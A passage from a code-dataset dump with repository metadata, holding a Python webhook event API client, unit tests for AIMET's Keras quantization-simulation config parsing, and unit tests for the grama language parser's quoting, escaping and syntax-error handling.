] | null | null | null | apis/event_api.py | tacklebox-webhooks/python | d2581110ab701467f5d584d0fd8ebb5f4c43a7aa | [
"MIT"
] | null | null | null | from .error import *
from .http_request import HttpRequest
from .http_client import HttpClient
class EventApi:
def __init__(self, config):
self.base_url = config['base_url']
self.http_client = HttpClient(config['api_key'])
self.validator = Validation()
def list_events(self, service_id, user_id):
if not self.validator.is_valid_id(service_id):
return new_error(
ERROR_TYPES['missing_parameter'],
"The list_events method must be invoked with a non-empty string service_id argument."
)
if not self.validator.is_valid_id(user_id):
return new_error(
ERROR_TYPES['missing_parameter'],
"The list_events method must be invoked with a non-empty string user_id argument."
)
path = f"services/{service_id}/users/{user_id}/events"
request = HttpRequest("GET", self.base_url, path)
return self.http_client.send(request)
def create_event(self, service_id, user_id, event_data):
if not self.validator.is_valid_id(service_id):
return new_error(
ERROR_TYPES['missing_parameter'],
"The create_event method must be invoked with a non-empty string service_id argument."
)
if not self.validator.is_valid_id(user_id):
return new_error(
ERROR_TYPES['missing_parameter'],
"The create_event method must be invoked with a non-empty string user_id argument."
)
if not self.validator.is_valid_event_data(event_data):
return new_error(
ERROR_TYPES['missing_parameter'],
"The create_event method must be invoked with an event_data argument containing non-empty event_type and payload properties."
)
path = f"services/{service_id}/users/{user_id}/events"
request = HttpRequest("POST", self.base_url, path, event_data)
return self.http_client.send(request)
def get_event(self, service_id, user_id, event_id):
if not self.validator.is_valid_id(service_id):
return new_error(
ERROR_TYPES['missing_parameter'],
"The get_event method must be invoked with a non-empty string service_id argument."
)
if not self.validator.is_valid_id(user_id):
return new_error(
ERROR_TYPES['missing_parameter'],
"The get_event method must be invoked with a non-empty string user_id argument."
)
if not self.validator.is_valid_id(event_id):
return new_error(
ERROR_TYPES['missing_parameter'],
"The get_event method must be invoked with a non-empty string event_id argument."
)
path = f"services/{service_id}/users/{user_id}/events/{event_id}"
request = HttpRequest("GET", self.base_url, path)
return self.http_client.send(request)
| 42.068493 | 141 | 0.620319 | 387 | 3,071 | 4.661499 | 0.157623 | 0.059867 | 0.039911 | 0.079823 | 0.808758 | 0.799335 | 0.799335 | 0.746674 | 0.746674 | 0.745565 | 0 | 0 | 0.299902 | 3,071 | 72 | 142 | 42.652778 | 0.83907 | 0 | 0 | 0.483333 | 0 | 0 | 0.323347 | 0.046565 | 0 | 0 | 0 | 0 | 0 | 1 | 0.066667 | false | 0 | 0.05 | 0 | 0.316667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
# ---- test.py | repo: cjsyzwsh/South_Australia_Transport_Econ @ 8c27f3015193113f8f479e7c0e0c3ff1ac42944e | license: MIT ----
import utils.util.compute_road_attributes as cra
# ---- TrainingExtensions/tensorflow/test/python/test_quantsim_config_keras.py | repo: lipovsek/aimet @ 236fb02cc6c45e65c067030416c49a09ace82045 | license: BSD-3-Clause ----
# =============================================================================
# @@-COPYRIGHT-START-@@
#
# Copyright (c) 2022, Qualcomm Innovation Center, Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# SPDX-License-Identifier: BSD-3-Clause
#
# @@-COPYRIGHT-END-@@
# =============================================================================
import json
import os

import pytest
pytestmark = pytest.mark.skip("Disable tests that require eager execution")

from tensorflow.keras.layers import InputLayer

from aimet_common.defs import QuantScheme
from aimet_tensorflow.keras.connectedgraph import ConnectedGraph
from aimet_tensorflow.keras.quantsim_config.quantsim_config import QuantSimConfigurator, INPUT_QUANTIZERS, \
    OUTPUT_QUANTIZERS, PARAM_QUANTIZERS
from test_models_keras import single_residual, concat_functional, tiny_conv_net


class TestQuantSimConfig:
    """
    Class containing unit tests for quantsim config feature
    """
    def test_mapping_layer_to_affected_quantizers_for_multi_input(self):
        """
        Test if layer and its affected quantizers are correctly mapped
        """
        model = concat_functional()
        connected_graph = ConnectedGraph(model)
        quant_sim_configurator = QuantSimConfigurator(connected_graph, QuantScheme.post_training_tf_enhanced,
                                                      "nearest", 8, 8, "")

        # layers excluding InputLayer
        layers = [x for x in model.layers if not isinstance(x, InputLayer)]
        dense1, dense2, dense3, concat1, dense4, dense5 = layers

        # Note:
        # 0 (Affected quantizers when enabling input quantizer of this layer)
        # 1 (Affected quantizers when enabling output quantizer of this layer)
        # 2 (Affected quantizers when disabling input quantizer of this layer)
        # 3 (Affected quantizers when disabling output quantizer of this layer)
        layer_to_affected_tensor_quantizers_dict = quant_sim_configurator._layer_to_affected_quantizer_info_dict

        # Input layer 1
        assert len(layer_to_affected_tensor_quantizers_dict[dense1][0]) == 1
        assert len(layer_to_affected_tensor_quantizers_dict[dense1][1]) == 1
        assert len(layer_to_affected_tensor_quantizers_dict[dense1][2]) == 1
        assert len(layer_to_affected_tensor_quantizers_dict[dense1][3]) == 2
        assert (dense1, "output") in layer_to_affected_tensor_quantizers_dict[dense1][3]
        assert (dense3, "input") in layer_to_affected_tensor_quantizers_dict[dense1][3]

        # Input layer 2
        assert len(layer_to_affected_tensor_quantizers_dict[dense2][0]) == 1
        assert len(layer_to_affected_tensor_quantizers_dict[dense2][1]) == 1
        assert len(layer_to_affected_tensor_quantizers_dict[dense2][2]) == 1
        assert len(layer_to_affected_tensor_quantizers_dict[dense2][3]) == 3
        assert (dense2, "output") in layer_to_affected_tensor_quantizers_dict[dense2][3]
        assert (dense3, "output") in layer_to_affected_tensor_quantizers_dict[dense2][3]
        assert (concat1, "input") in layer_to_affected_tensor_quantizers_dict[dense2][3]

        # Layer having multiple producers (Concat layer)
        assert len(layer_to_affected_tensor_quantizers_dict[concat1][0]) == 1
        assert len(layer_to_affected_tensor_quantizers_dict[concat1][1]) == 1
        assert len(layer_to_affected_tensor_quantizers_dict[concat1][2]) == 3
        assert (concat1, "input") in layer_to_affected_tensor_quantizers_dict[concat1][2]
        assert (dense2, "output") in layer_to_affected_tensor_quantizers_dict[concat1][2]
        assert (dense3, "output") in layer_to_affected_tensor_quantizers_dict[concat1][2]
        assert len(layer_to_affected_tensor_quantizers_dict[concat1][3]) == 2

        # Last layer
        assert len(layer_to_affected_tensor_quantizers_dict[dense5][0]) == 1
        assert len(layer_to_affected_tensor_quantizers_dict[dense5][1]) == 1
        assert len(layer_to_affected_tensor_quantizers_dict[dense5][2]) == 2
        assert len(layer_to_affected_tensor_quantizers_dict[dense5][3]) == 1
        assert (dense5, "output") in layer_to_affected_tensor_quantizers_dict[dense5][3]
    def test_mapping_layer_to_affected_quantizers_for_single_residual(self):
        """
        Test if layer and its affected quantizers are correctly mapped
        """
        model = single_residual()
        connected_graph = ConnectedGraph(model)
        quant_sim_configurator = QuantSimConfigurator(connected_graph, QuantScheme.post_training_tf_enhanced,
                                                      "nearest", 8, 8, "")

        # layers excluding InputLayer
        layers = model.layers[1:]
        conv1, bn1, max_pool1, conv2, conv4 = layers[0], layers[1], layers[3], layers[4], layers[7]
        conv3, avg_pool1, add1, dense1 = layers[8], layers[9], layers[10], layers[14]

        # Note:
        # 0 (Affected quantizers when enabling input quantizer of this layer)
        # 1 (Affected quantizers when enabling output quantizer of this layer)
        # 2 (Affected quantizers when disabling input quantizer of this layer)
        # 3 (Affected quantizers when disabling output quantizer of this layer)
        layer_to_affected_tensor_quantizers_dict = quant_sim_configurator._layer_to_affected_quantizer_info_dict

        # First layer
        assert len(layer_to_affected_tensor_quantizers_dict[conv1][0]) == 1
        assert len(layer_to_affected_tensor_quantizers_dict[conv1][1]) == 1
        assert len(layer_to_affected_tensor_quantizers_dict[conv1][2]) == 1
        assert len(layer_to_affected_tensor_quantizers_dict[conv1][3]) == 2
        assert (conv1, "output") in layer_to_affected_tensor_quantizers_dict[conv1][3]
        assert (bn1, "input") in layer_to_affected_tensor_quantizers_dict[conv1][3]

        # Layer having multiple consumers (MaxPool layer)
        assert len(layer_to_affected_tensor_quantizers_dict[max_pool1][0]) == 1
        assert len(layer_to_affected_tensor_quantizers_dict[max_pool1][1]) == 1
        assert len(layer_to_affected_tensor_quantizers_dict[max_pool1][2]) == 2
        assert len(layer_to_affected_tensor_quantizers_dict[max_pool1][3]) == 3
        assert (max_pool1, "output") in layer_to_affected_tensor_quantizers_dict[max_pool1][3]
        assert (conv2, "input") in layer_to_affected_tensor_quantizers_dict[max_pool1][3]
        assert (conv4, "input") in layer_to_affected_tensor_quantizers_dict[max_pool1][3]

        # Layer having multiple producers (Add layer)
        assert len(layer_to_affected_tensor_quantizers_dict[add1][0]) == 1
        assert len(layer_to_affected_tensor_quantizers_dict[add1][1]) == 1
        assert len(layer_to_affected_tensor_quantizers_dict[add1][2]) == 3
        assert (add1, "input") in layer_to_affected_tensor_quantizers_dict[add1][2]
        assert (conv3, "output") in layer_to_affected_tensor_quantizers_dict[add1][2]
        assert (avg_pool1, "output") in layer_to_affected_tensor_quantizers_dict[add1][2]
        assert len(layer_to_affected_tensor_quantizers_dict[add1][3]) == 2

        # Last layer
        assert len(layer_to_affected_tensor_quantizers_dict[dense1][0]) == 1
        assert len(layer_to_affected_tensor_quantizers_dict[dense1][1]) == 1
        assert len(layer_to_affected_tensor_quantizers_dict[dense1][2]) == 2
        assert len(layer_to_affected_tensor_quantizers_dict[dense1][3]) == 1
    def test_parse_config_file_defaults(self):
        """
        Test that default quantization parameters are set correctly when using json config file
        """
        quantsim_config = {
            "defaults": {
                "ops": {
                    "is_output_quantized": "True",
                    "is_symmetric": "False"
                },
                "params": {
                    "is_quantized": "False",
                    "is_symmetric": "True"
                },
                "per_channel_quantization": "True",
            },
            "params": {},
            "op_type": {},
            "supergroups": [],
            "model_input": {},
            "model_output": {}
        }
        with open('./data/quantsim_config.json', 'w') as f:
            json.dump(quantsim_config, f)

        model = single_residual()
        connected_graph = ConnectedGraph(model)
        quant_sim_configurator = QuantSimConfigurator(connected_graph, QuantScheme.post_training_tf_enhanced,
                                                      "nearest", 8, 8, "./data/quantsim_config.json")
        layer_to_quantizers_dict = quant_sim_configurator._layer_to_quantizers_dict
        for op in connected_graph.ordered_ops:
            layer = op.get_module()
            for q in layer_to_quantizers_dict[layer][INPUT_QUANTIZERS]:
                assert not q.is_enabled()
                assert not q.is_symmetric
            for q in layer_to_quantizers_dict[layer][OUTPUT_QUANTIZERS]:
                assert q.is_enabled()
                assert not q.is_symmetric
            for q in layer_to_quantizers_dict[layer][PARAM_QUANTIZERS]:
                assert not q.is_enabled()
                assert q.is_symmetric

        if os.path.exists('./data/quantsim_config.json'):
            os.remove('./data/quantsim_config.json')
    def test_parse_config_file_symmetric_modes(self):
        """
        Test that strict/unsigned symmetric flags are set correctly when using json config file
        """
        quantsim_config = {
            "defaults": {
                "ops": {},
                "params": {},
                "strict_symmetric": "True",
                "unsigned_symmetric": "False"
            },
            "params": {},
            "op_type": {},
            "supergroups": [],
            "model_input": {},
            "model_output": {}
        }
        with open('./data/quantsim_config.json', 'w') as f:
            json.dump(quantsim_config, f)

        model = single_residual()
        connected_graph = ConnectedGraph(model)
        quant_sim_configurator = QuantSimConfigurator(connected_graph, QuantScheme.post_training_tf_enhanced,
                                                      "nearest", 8, 8, "./data/quantsim_config.json")
        layer_to_quantizers_dict = quant_sim_configurator._layer_to_quantizers_dict
        for op in connected_graph.ordered_ops:
            layer = op.get_module()
            for q in layer_to_quantizers_dict[layer][INPUT_QUANTIZERS]:
                assert q.use_strict_symmetric
                assert not q.use_unsigned_symmetric
            for q in layer_to_quantizers_dict[layer][OUTPUT_QUANTIZERS]:
                assert q.use_strict_symmetric
                assert not q.use_unsigned_symmetric
            for q in layer_to_quantizers_dict[layer][PARAM_QUANTIZERS]:
                assert q.use_strict_symmetric
                assert not q.use_unsigned_symmetric

        if os.path.exists('./data/quantsim_config.json'):
            os.remove('./data/quantsim_config.json')
    def test_parse_config_file_params(self):
        """
        Test that param specific quantization parameters are set correctly when using json config file
        """
        quantsim_config = {
            "defaults": {
                "ops": {
                    "is_output_quantized": "True",
                    "is_symmetric": "False"
                },
                "params": {
                    "is_quantized": "False",
                    "is_symmetric": "True"
                }
            },
            "params": {
                "weight": {
                    "is_quantized": "True",
                    "is_symmetric": "False"
                }
            },
            "op_type": {},
            "supergroups": [],
            "model_input": {},
            "model_output": {}
        }
        with open("./data/quantsim_config.json", "w") as f:
            json.dump(quantsim_config, f)

        model = single_residual()
        connected_graph = ConnectedGraph(model)
        quant_sim_configurator = QuantSimConfigurator(connected_graph, QuantScheme.post_training_tf_enhanced,
                                                      "nearest", 8, 8, "./data/quantsim_config.json")
        layer_to_quantizers_dict = quant_sim_configurator._layer_to_quantizers_dict
        for op in connected_graph.ordered_ops:
            layer = op.get_module()
            for q in layer_to_quantizers_dict[layer][PARAM_QUANTIZERS]:
                if "bias" in q.name:
                    assert not q.is_enabled()
                    assert q.is_symmetric
                else:
                    assert q.is_enabled()
                    assert not q.is_symmetric

        if os.path.exists("./data/quantsim_config.json"):
            os.remove("./data/quantsim_config.json")
    def test_parse_config_file_op_type(self):
        """
        Test that op specific quantization parameters are set correctly when using json config file
        """
        quantsim_config = {
            "defaults": {
                "ops": {
                    "is_output_quantized": "True",
                    "is_symmetric": "False"
                },
                "params": {
                    "is_quantized": "False",
                    "is_symmetric": "True"
                }
            },
            "params": {},
            "op_type": {
                "Conv": {
                    "is_input_quantized": "True",
                    "is_symmetric": "False",
                    "params": {
                        "bias": {
                            "is_quantized": "True",
                            "is_symmetric": "False"
                        }
                    }
                }
            },
            "supergroups": [],
            "model_input": {},
            "model_output": {}
        }
        with open("./data/quantsim_config.json", "w") as f:
            json.dump(quantsim_config, f)

        model = single_residual()
        connected_graph = ConnectedGraph(model)
        quant_sim_configurator = QuantSimConfigurator(connected_graph, QuantScheme.post_training_tf_enhanced,
                                                      "nearest", 8, 8, "./data/quantsim_config.json")
        layer_to_quantizers_dict = quant_sim_configurator._layer_to_quantizers_dict
        for op in connected_graph.ordered_ops:
            layer = op.get_module()
            for q in layer_to_quantizers_dict[layer][INPUT_QUANTIZERS]:
                if op.type == "Conv":
                    assert q.is_enabled()
                    assert not q.is_symmetric
                else:
                    assert not q.is_enabled()
                    assert not q.is_symmetric
            for q in layer_to_quantizers_dict[layer][OUTPUT_QUANTIZERS]:
                assert q.is_enabled()
                assert not q.is_symmetric
            for q in layer_to_quantizers_dict[layer][PARAM_QUANTIZERS]:
                if op.type == "Conv" and "bias" in q.name:
                    assert q.is_enabled()
                    assert not q.is_symmetric
                else:
                    assert not q.is_enabled()
                    assert q.is_symmetric

        if os.path.exists("./data/quantsim_config.json"):
            os.remove("./data/quantsim_config.json")
    def test_parse_config_file_op_type_conflict_case(self):
        """
        Test that conflicting op type settings raise an error when using json config file
        """
        quantsim_config = {
            "defaults": {
                "ops": {},
                "params": {}
            },
            "params": {},
            "op_type": {
                "Conv": {
                    "is_input_quantized": "True",
                    "is_output_quantized": "False"
                },
                "BatchNormalization": {
                    "is_input_quantized": "True"
                }
            },
            "supergroups": [],
            "model_input": {},
            "model_output": {}
        }
        with open('./data/quantsim_config.json', 'w') as f:
            json.dump(quantsim_config, f)

        model = single_residual()
        connected_graph = ConnectedGraph(model)
        with pytest.raises(RuntimeError):
            _ = QuantSimConfigurator(connected_graph, QuantScheme.post_training_tf_enhanced, "nearest",
                                     8, 8, "./data/quantsim_config.json")

        if os.path.exists("./data/quantsim_config.json"):
            os.remove("./data/quantsim_config.json")
    def test_parse_config_file_model_inputs(self):
        """
        Test that model input quantization parameters are set correctly when using json config file
        """
        quantsim_config = {
            "defaults": {
                "ops": {},
                "params": {}
            },
            "params": {},
            "op_type": {},
            "supergroups": [],
            "model_input": {
                "is_input_quantized": "True"
            },
            "model_output": {}
        }
        with open("./data/quantsim_config.json", "w") as f:
            json.dump(quantsim_config, f)

        model = single_residual()
        connected_graph = ConnectedGraph(model)
        quant_sim_configurator = QuantSimConfigurator(connected_graph, QuantScheme.post_training_tf_enhanced,
                                                      "nearest", 8, 8, "./data/quantsim_config.json")
        layer_to_quantizers_dict = quant_sim_configurator._layer_to_quantizers_dict
        conv1 = model.layers[1]
        for op in connected_graph.ordered_ops:
            layer = op.get_module()
            for q in layer_to_quantizers_dict[layer][INPUT_QUANTIZERS]:
                if layer == conv1:
                    assert q.is_enabled()
                else:
                    assert not q.is_enabled()
                assert not q.is_symmetric
            for q in layer_to_quantizers_dict[layer][OUTPUT_QUANTIZERS]:
                assert not q.is_enabled()
                assert not q.is_symmetric
            for q in layer_to_quantizers_dict[layer][PARAM_QUANTIZERS]:
                assert not q.is_enabled()
                assert not q.is_symmetric

        if os.path.exists("./data/quantsim_config.json"):
            os.remove("./data/quantsim_config.json")
    def test_parse_config_file_supergroups(self):
        """
        Test that supergroup quantization parameters are set correctly when using json config file
        """
        quantsim_config = {
            "defaults": {
                "ops": {
                    "is_output_quantized": "True",
                    "is_symmetric": "False"
                },
                "params": {
                    "is_quantized": "False",
                    "is_symmetric": "False"
                }
            },
            "params": {},
            "op_type": {},
            "supergroups": [
                {
                    "op_list": ["Conv", "BatchNormalization"]
                },
                {
                    "op_list": ["Relu", "MaxPool"]
                },
                {
                    "op_list": ["Conv", "Relu", "AveragePool"]
                }
            ],
            "model_input": {},
            "model_output": {}
        }
        with open("./data/quantsim_config.json", "w") as f:
            json.dump(quantsim_config, f)

        model = tiny_conv_net()
        connected_graph = ConnectedGraph(model)
        quant_sim_configurator = QuantSimConfigurator(connected_graph, QuantScheme.post_training_tf_enhanced,
                                                      "nearest", 8, 8, "./data/quantsim_config.json")
        layer_to_quantizers_dict = quant_sim_configurator._layer_to_quantizers_dict
        conv1, relu1, conv2, conv3 = model.layers[1], model.layers[3], model.layers[5], model.layers[8]
        relu3 = model.layers[9]
        bn1, maxpool, bn2, avgpool = model.layers[2], model.layers[4], model.layers[6], model.layers[10]
        for op in connected_graph.ordered_ops:
            layer = op.get_module()
            # Check configs for starts of supergroups
            if layer in [conv1, relu1, conv2, conv3]:
                for q in layer_to_quantizers_dict[layer][OUTPUT_QUANTIZERS]:
                    assert not q.is_enabled()
            # Check configs for middle ops in supergroups
            elif layer == relu3:
                for q in layer_to_quantizers_dict[layer][INPUT_QUANTIZERS]:
                    assert not q.is_enabled()
                for q in layer_to_quantizers_dict[layer][OUTPUT_QUANTIZERS]:
                    assert not q.is_enabled()
            # Check configs for ends of supergroups
            elif layer in [bn1, maxpool, bn2, avgpool]:
                for q in layer_to_quantizers_dict[layer][INPUT_QUANTIZERS]:
                    assert not q.is_enabled()
                for q in layer_to_quantizers_dict[layer][OUTPUT_QUANTIZERS]:
                    assert q.is_enabled()
            else:
                for q in layer_to_quantizers_dict[layer][INPUT_QUANTIZERS]:
                    assert not q.is_enabled()
                for q in layer_to_quantizers_dict[layer][OUTPUT_QUANTIZERS]:
                    assert q.is_enabled()

        if os.path.exists("./data/quantsim_config.json"):
            os.remove("./data/quantsim_config.json")
    def test_parse_config_file_model_outputs(self):
        """
        Test that model output quantization parameters are set correctly when using json config file
        """
        quantsim_config = {
            "defaults": {
                "ops": {},
                "params": {}
            },
            "params": {},
            "op_type": {},
            "supergroups": [],
            "model_input": {},
            "model_output": {
                "is_output_quantized": "True"
            }
        }
        with open("./data/quantsim_config.json", "w") as f:
            json.dump(quantsim_config, f)

        model = single_residual()
        connected_graph = ConnectedGraph(model)
        quant_sim_configurator = QuantSimConfigurator(connected_graph, QuantScheme.post_training_tf_enhanced,
                                                      "nearest", 8, 8, "./data/quantsim_config.json")
        layer_to_quantizers_dict = quant_sim_configurator._layer_to_quantizers_dict
        fc = model.layers[-1]
        for op in connected_graph.ordered_ops:
            layer = op.get_module()
            for q in layer_to_quantizers_dict[layer][INPUT_QUANTIZERS]:
                assert not q.is_enabled()
                assert not q.is_symmetric
            for q in layer_to_quantizers_dict[layer][OUTPUT_QUANTIZERS]:
                if layer == fc:
                    assert q.is_enabled()
                else:
                    assert not q.is_enabled()
                assert not q.is_symmetric
            for q in layer_to_quantizers_dict[layer][PARAM_QUANTIZERS]:
                assert not q.is_enabled()
                assert not q.is_symmetric

        if os.path.exists("./data/quantsim_config.json"):
            os.remove("./data/quantsim_config.json")
# ---- test/parser_test.py | repo: xyzdev/grama @ f9ef5ccea28a5ca10aedfde21fbce613ce78092e | license: MIT ----
from nose.tools import assert_equal, assert_raises_regexp
from grama.grama import Instruction, Address, Parser


class Test(object):
    @staticmethod
    def assert_instruction(expected_action, expected_addr1, expected_addr2, expected_addr3, expected_ofs, actual):
        assert_equal(expected_action, actual.action)
        assert_equal(str(expected_addr1), str(actual.source))
        assert_equal(str(expected_addr2), str(actual.target))
        assert_equal(str(expected_addr3), str(actual.link))
        assert_equal(expected_ofs, actual.offset)
    def test_multiple_complex_statements_on_one_line(self):
        parser = Parser()
        instr = parser.parse("\\21;' '#';\\7d\n\\21/' '>' ';\\21/' '?' ':-1")
        assert_equal(4, len(instr))
        self.assert_instruction(Instruction.CREATE, Address('!'), None, None, 1, instr[0])
        self.assert_instruction(Instruction.CREATE, Address(' '), None, None, 1, instr[1])
        self.assert_instruction(Instruction.LINK, Address('!'), Address(' '), Address(' '), 1, instr[2])
        self.assert_instruction(Instruction.MATCH, Address('!', [' ']), Address(' '), None, -1, instr[3])

    def test_comment(self):
        parser = Parser()
        instr = parser.parse(" # Comment")
        assert_equal(0, len(instr))

        instr = parser.parse("# Comment with no leading space")
        assert_equal(0, len(instr))

        instr = parser.parse("a# Comment")
        assert_equal(1, len(instr))
        self.assert_instruction(Instruction.CREATE, Address('a'), None, None, 1, instr[0])

        instr = parser.parse("a# Comment\nb # Comment")
        assert_equal(2, len(instr))
        self.assert_instruction(Instruction.CREATE, Address('a'), None, None, 1, instr[0])
        self.assert_instruction(Instruction.CREATE, Address('b'), None, None, 1, instr[1])
    def test_create(self):
        parser = Parser()
        instr = parser.parse("uncomplicated_concept_name")
        assert_equal(1, len(instr))
        self.assert_instruction(Instruction.CREATE, Address('uncomplicated_concept_name'), None, None, 1, instr[0])

    def test_create_quoted(self):
        parser = Parser()
        instr = parser.parse("'uncomplicated_concept_name'")
        assert_equal(1, len(instr))
        self.assert_instruction(Instruction.CREATE, Address('uncomplicated_concept_name'), None, None, 1, instr[0])

    def test_create_missing_end_quote(self):
        parser = Parser()
        with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
            parser.parse("'uncomplicated_concept_name")

    def test_create_quoted_complex(self):
        parser = Parser()
        instr = parser.parse("'\\27 />?:-;#\\41'#Comment'")
        assert_equal(1, len(instr))
        self.assert_instruction(Instruction.CREATE, Address("' />?:-;#A"), None, None, 1, instr[0])

    def test_create_complex(self):
        parser = Parser()
        instr = parser.parse("\\27\\20\\2f\\3e\\3f\\3a-\\3b\\41#Comment'\n")
        assert_equal(1, len(instr))
        self.assert_instruction(Instruction.CREATE, Address("' />?:-;A"), None, None, 1, instr[0])

    def test_create_path(self):
        parser = Parser()
        with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1:'):
            parser.parse("/a")
        with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1:'):
            parser.parse("a/")
        with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1:'):
            parser.parse("a/b")
    def test_link(self):
        parser = Parser()
        instr = parser.parse("uncomplicated_concept_name/uncompl_link>other_uncompl_name")
        assert_equal(1, len(instr))
        self.assert_instruction(Instruction.LINK,
                                Address('uncomplicated_concept_name'),
                                Address('other_uncompl_name'),
                                Address('uncompl_link'), 1, instr[0])

    def test_link_target_link(self):
        parser = Parser()
        instr = parser.parse("uncomplicated_concept_name/uncompl_link>other_uncompl_name/other_link")
        assert_equal(1, len(instr))
        self.assert_instruction(Instruction.LINK,
                                Address('uncomplicated_concept_name'),
                                Address('other_uncompl_name', ['other_link']),
                                Address('uncompl_link'), 1, instr[0])

    def test_link_source_link(self):
        parser = Parser()
        instr = parser.parse("uncomplicated_concept_name/other_src_link/uncompl_link>other_uncompl_name/other_link")
        assert_equal(1, len(instr))
        self.assert_instruction(Instruction.LINK,
                                Address('uncomplicated_concept_name', ['other_src_link']),
                                Address('other_uncompl_name', ['other_link']),
                                Address('uncompl_link'), 1, instr[0])

    def test_link_quoted(self):
        parser = Parser()
        instr = parser.parse("'uncomplicated_concept_name'/'other_src_link'/'uncompl_link'>"
                             "'other_uncompl_name'/'other_link'")
        assert_equal(1, len(instr))
        self.assert_instruction(Instruction.LINK,
                                Address('uncomplicated_concept_name', ['other_src_link']),
                                Address('other_uncompl_name', ['other_link']),
                                Address('uncompl_link'), 1, instr[0])

    def test_link_complex(self):
        parser = Parser()
        instr = parser.parse("\\27\\20\\2f\\3e\\3f\\3a-\\3b\\41/\\27\\20\\2f\\3e\\3f\\3a-\\3b\\42/"
                             "\\27\\20\\2f\\3e\\3f\\3a-\\3b\\43>"
                             "\\27\\20\\2f\\3e\\3f\\3a-\\3b\\44/\\27\\20\\2f\\3e\\3f\\3a-\\3b\\45 #Comment")
        assert_equal(1, len(instr))
        self.assert_instruction(Instruction.LINK,
                                Address("' />?:-;A", ["' />?:-;B"]),
                                Address("' />?:-;D", ["' />?:-;E"]),
                                Address("' />?:-;C"), 1, instr[0])

    def test_link_quoted_complex(self):
        parser = Parser()
        instr = parser.parse("'\\27 />?:-;#\\41'/'\\27 />?:-;#\\42'/'\\27 />?:-;#\\43'>"
                             "'\\27 />?:-;#\\44'/'\\27 />?:-;#\\45'")
        assert_equal(1, len(instr))
        self.assert_instruction(Instruction.LINK,
                                Address("' />?:-;#A", ["' />?:-;#B"]),
                                Address("' />?:-;#D", ["' />?:-;#E"]),
                                Address("' />?:-;#C"), 1, instr[0])

    def test_link_to_new(self):
        parser = Parser()
        instr = parser.parse("'\\27 />?:-;#\\41'/'\\27 />?:-;#\\42'/'\\27 />?:-;#\\43'>+")
        assert_equal(1, len(instr))
        self.assert_instruction(Instruction.LINK,
                                Address("' />?:-;#A", ["' />?:-;#B"]),
                                Address(Address.NEW),
                                Address("' />?:-;#C"), 1, instr[0])
    def test_link_missing_quote(self):
        parser = Parser()
        with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
            parser.parse("'a/'b'/'c'>'d'/'e'")
        with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
            parser.parse("'a'/'b/'c'>'d'/'e'")
        with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
            parser.parse("'a'/'b'/'c>'d'/'e'")
        with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
            parser.parse("'a'/'b'/'c'>'d/'e'")
        with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
            parser.parse("'a'/'b'/'c'>'d'/'e")
        with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
            parser.parse("a'/'b'/'c'>'d'/'e'")
        with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
            parser.parse("'a'/b'/'c'>'d'/'e'")
        with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
            parser.parse("'a'/'b'/c'>'d'/'e'")
        with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
            parser.parse("'a'/'b'/'c'>d'/'e'")
        with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
            parser.parse("'a'/'b'/'c'>'d'/e'")

    def test_link_missing_link(self):
        parser = Parser()
        with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
            parser.parse("a>b/c")
        with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
            parser.parse("a/>b/c")
        with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
            parser.parse(">b")

    def test_link_missing_target(self):
        parser = Parser()
        with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
            parser.parse("a/b")
        with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
            parser.parse("a/b/c")
        with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
            parser.parse("a/b>")

    def test_link_extra_slash(self):
        parser = Parser()
        with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
            parser.parse("/a>b/c")
        with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
            parser.parse("a/b/>c/d")
        with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
            parser.parse("a/b>/c/d")
